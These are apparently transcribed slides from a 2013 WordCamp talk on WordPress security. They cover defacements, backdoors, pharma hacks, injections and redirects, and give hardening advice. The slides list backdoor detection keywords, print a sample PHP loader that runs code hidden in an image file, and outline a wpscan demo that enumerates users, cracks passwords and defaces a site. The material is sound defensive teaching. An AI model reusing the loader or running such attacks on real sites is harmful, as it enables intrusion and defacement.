Dre Armeda gives a presentation on WordPress security and dealing with hacks. He discusses common issues like defacements, backdoors, pharma hacks, injections, and malicious redirects. He demonstrates how hackers can easily enumerate users and passwords on a WordPress site using tools like wpscan. Armeda emphasizes the importance of access control, updating WordPress and plugins, disabling PHP execution, and using security plugins to reduce risks.

1. WordPress Security
Dealing with Today’s Hacks

2. If you don’t ask, you don’t get!
• Dre Armeda, CISSP
• CEO, Co-Founder at Sucuri Inc.
• @dremeda
• Dre.im
I'm a Harley enthusiast, and a Chargers
fan. I wear many hats, and love tacos. I'm
infatuated with WordPress, web design,
and web security. I work at Sucuri
Security. I hope to help make the web a
safer place!
1/19/2013 Dre Armeda - @dremeda #wcphx

3. Why listen to me? You don’t have to, but…
• 12 years running IT, IS, Crypto, InfoSec & PhySec for the US Navy.
– Managed security awareness for Sempra Energy
– Deployed security suite for 1-800-Flowers.
– Cleaned Martha Steward web properties of malware
• Not an expert, passionate enthusiast.
• Seriously though – Quick Sucuri stats:
– Remediate 200 – 300 infected websites a day,
• 24/7/365
– Perform 2 million + malware website scans a month
– Support all CMS platforms and custom applications (e.g., WordPress,
Joomla, osCommerce, vBulletin, Drupal, .NET, etc… )
My goal in life is to make the web a safer place!
1/19/2013 Dre Armeda - @dremeda #wcphx

4. Thoughts To Kick Things Off
• Information Security is about risk reduction.
– If you’re looking for the “silver bullet” this is the
wrong talk for you.
• To think that you will never be infected is like
saying you will never be sick.
– Someone tells you different – Percussion calibration
time
• Prevention is ideal, but not realistic.
– Risk will never be 0%
– Detection is key.
1/19/2013 Dre Armeda - @dremeda #wcphx

5. Know Your Enemy
• They have time & resources
• They are intelligent
• Attacks are automated
• Goal is to impact quantity
• Own one, own them all…
• It’s not personal
1/19/2013 Dre Armeda - @dremeda #wcphx

6. Ok, so what’s the problem?
TODAY’S ISSUES:
• The Ecosystem /
Environment
• Access Control
• Software Vulnerabilities
• Administration
• Credential Management
• Extensibility
1/19/2013 Dre Armeda - @dremeda #wcphx

7. Today’s Focus
• Ecosystem / Environment
• Access Control
• Dealing with Hacks
1/19/2013 Dre Armeda - @dremeda #wcphx

8. Logical Architecture
Linux Operating System
Apache MySQL PHP
WordPress CPANEL Plesk phpMyAdmin PHP-CGI Modules Modules
1/19/2013 Dre Armeda - @dremeda #wcphx

9. The EcoSystem / Environment
• Apache
– Malicious module injects iFrames
– http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module-
injects-iframes/
• phpMyAdmin
– Mirror Hacked
– http://sourceforge.net/blog/phpmyadmin-back-door/
• PHP-CGI
– Remote Code Execution
– http://blog.sucuri.net/2012/05/php-cgi-vulnerability-exploited-in-the-
wild.html
• Plesk
– Vulnerable to SQLi attacks
– http://blog.sucuri.net/2012/06/plesk-vulnerability-leading-to-
malware.html
1/19/2013 Dre Armeda - @dremeda #wcphx

10. The EcoSystem / Environment
• What can you do?
– Not much… completely outside of your control if
you’re using a shared or managed host
• But, you can reduce risk...
– Use a Dedicated / VPS Environment
• But recognize the responsibility that this entails, if you
what I mentioned previously doesn’t make sense, skip to
next step
– Go with a Managed Host
• Doesn’t mean you’ll be safer, but it does mean you’ll have
resources to lean on
1/19/2013 Dre Armeda - @dremeda #wcphx

11. Access is Key
• We have to change the way we treat and think
about access. All access – Server / Application
• We are going through the same mistakes servers
and desktops were making in the 90’s with
access.
• Know where you are surfing the web, do you
really need to log in as an admin at the coffee
shop?
1/19/2013 Dre Armeda - @dremeda #wcphx

12. Before We Dive In
1/19/2013 Dre Armeda - @dremeda #wcphx

13. WordPress Loving Infections
• Defacements
• Backdoors
• Pharma Hack
• Injections
– iFrame Specifically
• Malicious Redirects
• Phishing
1/19/2013 Dre Armeda - @dremeda #wcphx

14. Hacktivism at its finest… you now support a cause!?!?!
DEFACEMENTS

15. Defacements
• Hacktivism 101
– Annoying as S*&T
• Places to look:
– Index.html
– Index.php
• Root Directory
• Wp-Content
• Theme Directory
• GREP is your friend:
– grep –ri ‘sniper399’ .
1/19/2013 Dre Armeda - @dremeda #wcphx

16. It’s ok to cry a little… 
BACKDOORS

17. Backdoors
• Common terms:
– Is_bot
– Eval
– Base64_decode
– Fopen
– Fclose
– readfile
– Edoced_46esad
– Exec
– System
– Shell_exec
– Gzuncompress
– popen
– FilesMan
1/19/2013 Dre Armeda - @dremeda #wcphx

18. Erectile Dysfunction pills are leading ads.. Who knew.. 
PHARMA HACK

19. Pharma Hack
• Multi-million $ Business
• Rarely Distribute Malware
• Impression based Affiliate
Marketing
• Google’s Search Engine Result
Pages (SERP)
• Odds of malware distribution are
actually low
• Tricks:
– Embedded within core files
– Look for “.tmp” directories = >
1/19/2013 Dre Armeda - @dremeda #wcphx

20. Pharma Hack, cntd..
• Try using CURL to emulate Google and Windows:
Curl –L –A
“Googlebot/2.1(+http://www.google.com/bot.html)”
http://someinfectedwebsite.com
– Google Webmaster Tools
• Fetch as Google Bot
• Check your Theme Index.php file for things like
this:
– <?php
$wp__theme_icon=@create_function(”,@file_get_co
ntents(‘/public_html/wp-content/themes/my-really-
good-theme/images/s.jpg’));$wp__theme_icon(); ?>
1/19/2013 Dre Armeda - @dremeda #wcphx

21. Pharma Hack, cntd..
1/19/2013 Dre Armeda - @dremeda #wcphx

22. It only hurts for a minute…
INJECTIONS

23. Injections
• Invisible iFrame’s - Executing on your browser
• Contributing to Drive-by-Downloads, Pharma, XSS, CSRF
• Places to check – Pages that generate content:
– JS files, Header.php, Index.php, Function.php, Footer.php
1/19/2013 Dre Armeda - @dremeda #wcphx

24. Injections, cntd…
• PHP iFrame Injection =>
– Count##.php
– Check all Index.php /
Theme JS files
– Example below:
1/19/2013 Dre Armeda - @dremeda #wcphx

25. Injections, cntd…
• Pharma Link
Injections =>
• Drive-By-
Downloads
1/19/2013 Dre Armeda - @dremeda #wcphx

26. WTF?!?! Why don’t I understand what it says?
MALICIOUS REDIRECTS

27. Malicious Redirects
• Redirects your user to a domain distributing malware,
fundamentally different than an iframe injection that
executes in your browser
• 8 out of 10 times, check your .htaccess file – all of them
– # find /var/www –name .htaccess –type f | wc –l
• Check for backdoors also – often a sign of a bigger issue
1/19/2013 Dre Armeda - @dremeda #wcphx

28. Biggest growing problem, exceptionally difficult to detect…
PHISHING

29. Phishing
• Growing at a faster pace than traditional web-
malware
• No impact to readers, but tied to SPAM bots
sending out emails like this:
1/19/2013 Dre Armeda - @dremeda #wcphx

30. Phishing, cntd…
1/19/2013 Dre Armeda - @dremeda #wcphx

31. Bringing the Point Home
DEMONSTRATION

32. Demo Objective
• Use good tools for bad things – wpscan
• Enumerate the users
• Enumrate Passwords
• Own target WordPress site
• Deface the Website
I have 5 minutes – Ready?
1/19/2013 Dre Armeda - @dremeda #wcphx

33. Remember the risk discussion?
KEEPING IT REAL

34. Update
• Oldest version found in production – 1.5
• Leading cause of cross-site contamination issues
• Perhaps the simplest of tasks, yet we still find this:
1/19/2013 Dre Armeda - @dremeda #wcphx

35. Access is Key
• On the Server:
– Kill accounts that are not in use
– FTP is the devil – slap yourself and switch to SFTP
– Disable password auth & use key pairs
• WordPress Admin:
– Multi-Factor Authentication on wp-admin
– Two-Factor Authentication on wp-login.php
• Employ least privileged:
– Only use admin accounts for admin tasks
– Learn to use Editor, Author, Contributor, Subscriber
1/19/2013 Dre Armeda - @dremeda #wcphx

36. Password Dilemma
• 15 character pass
– 3 months to crack
• Long / Complex / Unique
– Key to Passwords
• Prefer Password Manager
– You don’t? ok..
– Passphrases work too
• iLuvWCLpHX:2013:S@nT@N b@By
• Come up with a process & stick to it:
– One scheme:
• Remember 8 characters
• Write Down 8 characters
• Save 20 characters
– Second scheme:
• Remember 20 characters
• Prefix characters with site name
• End sequence with some date
1/19/2013 Dre Armeda - @dremeda #wcphx

37. Kill PHP Execution
• Kill PHP Execution
– Directories:
• WP-INCLUDES
• WP-CONTENT
• UPLOADS – At a minimum
<Files *.php>
Deny from all
</Files>
1/19/2013 Dre Armeda - @dremeda #wcphx

38. Disable Theme / Plugin Editor
I’d take it a step further and remove the ability to install, but
that’s just me.
Modify WP-CONFIG.PHP With:
• Disable the Plugin / Theme Editor
– Define(‘DISALLOW_FILE_EDIT’,true);
- OR -
• Disable the Plugin / Theme Update and Installation
– Define(‘DISALLOW_FILE_MODS’,true);
1/19/2013 Dre Armeda - @dremeda #wcphx

39. Plugins That Help
Sucuri Clients Non-Clients
• Sucuri Security Plugin • Limit Login Attempts
• Theme-Check • Theme-Check
• BackupBuddy • BackupBuddy
• Akismet • Akismet
1/19/2013 Dre Armeda - @dremeda #wcphx

40. Need a Hand?
Support Forums Online Resources
• Hacked – • Sucuri Blog:
http://wordpress.org/tags/ http://blog.sucuri.net
hacked • SiteCheck Scanner:
http://sitecheck.sucuri.net
• Unmask Parasites:
• Malware – http://unmaskparasites.com
http://wordpress.org/tags/ • Perishable Press:
malware http://perishablepress.com/ca
tegory/web-design/security/
• Secunia Security Advisories:
• BadwareBusters – http://secunia.com/communit
https://badwarebusters.org y/advisories/search/?search=
wordpress
1/19/2013 Dre Armeda - @dremeda #wcphx

41. Dre Armeda, CISSP
Dre.im
@dremeda
Sucuri Inc.
http://sucuri.net
http://blog.sucuri.net
@sucuri_security
Thanks to Tony Perez @perezbox for allowing me to cannibalize his slide deck.
1/19/2013 Dre Armeda - @dremeda #wcphx